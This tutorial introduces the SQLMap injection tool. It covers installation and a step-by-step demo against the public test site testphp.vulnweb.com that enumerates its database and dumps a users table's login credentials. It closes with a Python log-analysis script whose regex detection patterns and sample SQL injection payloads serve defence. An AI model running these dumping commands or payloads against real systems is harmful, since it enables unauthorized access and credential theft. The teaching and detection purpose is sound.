Using SQLMap to exploit SQL Injection (SQLi) vulnerabilities

Tram Ho

Before getting into SQLMap, you should understand what an SQL Injection vulnerability is. I previously wrote an article introducing the basics of this type of attack here. Today’s article covers SQLMap’s main features, its installation, and a demo with the tool.

What is SQLMap

  • SQLMap is a tool for exploiting SQL injection vulnerabilities in databases. It is widely regarded as the best SQL injection exploitation tool available today and is used regularly in both security and hacker circles. On Kali Linux or BackTrack 5, SQLMap is already integrated into the operating system; on Windows, Python and SQLMap must be installed separately.
  • It is an open source tool that automates the process of detecting and exploiting SQL injection flaws. It comes with a powerful detection engine and many features that make it suitable for the ultimate penetration tester.

Features

  • Full support for the database management systems MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, …
  • Full support for the SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band
  • Connect directly to the database without going through an SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatically recognize password hash formats and support cracking them with a dictionary-based attack.
  • Dump entire database tables, a range of entries, or specific columns of the user’s choice
  • Search for specific database names, specific tables across all databases, or specific columns across all database tables
  • Download and upload any file from or to the database server’s underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Execute arbitrary commands and retrieve their standard output on the database server’s underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server

How to install

Windows

Step 1: Download the Python and SQLMap installation files
Python installation link: https://www.python.org/ftp/python/2….hon-2.7.10.msi
SQLMap installation link: https://github.com/sqlmapproject/sqlmap/zipball/master

Step 2: Install Python. Open the file python-2.7.10.msi, select “Install for all users”, then click Next

Select the installation location (the default is C:\Python27)

Wait for the installer to complete and click Finish

Step 3: Extract the downloaded sqlmap archive and copy the whole sqlmap directory to C:\Python27

Open cmd and navigate to the directory where you just saved SQLMap

That’s it; sqlmap is now ready to use

Kali Linux

  • SQLMap is already installed in Kali
  • To use it, go to Applications -> Exploitation Tools -> SQLMap, or type sqlmap in a terminal

The basic commands

Demo

In this demo, we will try to find login information on the website http://testphp.vulnweb.com/ (this is a demo website, so you can try it out for yourself)

Step 1: Open the terminal and type the following command:
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query"
-u is the URL of the target. SQLMap will detect the target’s flaw and give information about it.

Step 2: Once the target website is identified as having SQL injection vulnerabilities, we need to find the database name
python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --dbs
--dbs is the option to list the website’s databases

Step 3: After determining the database name, we find the names of the tables in that database
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --tables -D acuart
--tables lists all the tables in the database named by -D, and -D gives the name of the database whose tables should be listed. The command above lists the tables in the acuart database

Step 4: Determine the names of the columns in the table
We see that the users table may contain login information, so we use the following command to determine the column names in the users table:
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --columns -D acuart -T users
--columns lists the columns of the table named by -T in the database named by -D. This command lists the fields of the users table in the acuart database

The users table has uname and pass fields, which are likely to hold an account name and password for logging into the system

Step 5: Get the data in the table
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --dump -D acuart -T users
The command above retrieves the records of the users table

The users table has 1 record, containing the username “test” and the password “test”. With this account we can log into the system
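The injection techniques listed under Features and the requests the demo sends against search.php?test=query also leave traces in the target's web server access log. The following Python script is an added example, not code from the original article or from the sqlmap project: it URL-decodes each request path, matches it against one pattern per technique family, and counts hits per client so that a single SQL keyword in a legitimate search stays below the alert threshold. The log lines are constructed, and the check that sqlmap's default User-Agent begins with "sqlmap/" is an assumption, since operators can change it.

```python
import re
from urllib.parse import unquote_plus

# One pattern per technique family named on this page; paths are URL-decoded
# first, because probes arrive percent-encoded (%27 for the quote, %20 for spaces).
TECHNIQUE_PATTERNS = {
    "boolean-based blind": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR\s+DELAY)\b", re.I),
    "error-based": re.compile(r"\b(EXTRACTVALUE|UPDATEXML)\s*\(", re.I),
    "UNION query-based": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "stacked queries": re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP|EXEC)\b", re.I),
}

# Apache/nginx "combined" format: ip ident user [time] "req" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample: one clean request, three probes from one client, and one
# legitimate search that merely happens to contain SQL keywords.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?test=query HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /search.php?test=query%27%20AND%201%3D1--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /search.php?test=query%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '203.0.113.9 - - [10/Oct/2023:13:55:42 +0000] "GET /search.php?test=query%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 HTTP/1.1" 200 700 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /search.php?test=union+select+committee HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (client_ip, [labels]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote_plus(m.group("path"))
    hits = [name for name, rx in TECHNIQUE_PATTERNS.items() if rx.search(path)]
    # Assumption: sqlmap's default User-Agent starts with "sqlmap/"; it is easily changed, so it only corroborates.
    if m.group("ua").lower().startswith("sqlmap/"):
        hits.append("sqlmap user-agent")
    return m.group("ip"), hits

def suspicious_clients(lines, threshold=3):
    """Clients whose total hits reach `threshold`; a scanner trips several families in a row."""
    counts = {}
    for line in lines:
        result = classify(line)
        if result:
            ip, hits = result
            counts[ip] = counts.get(ip, 0) + len(hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

On the sample, only 203.0.113.9 crosses the threshold; the legitimate "union select committee" search from 198.51.100.7 scores a single hit and is not reported.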


Source : Viblo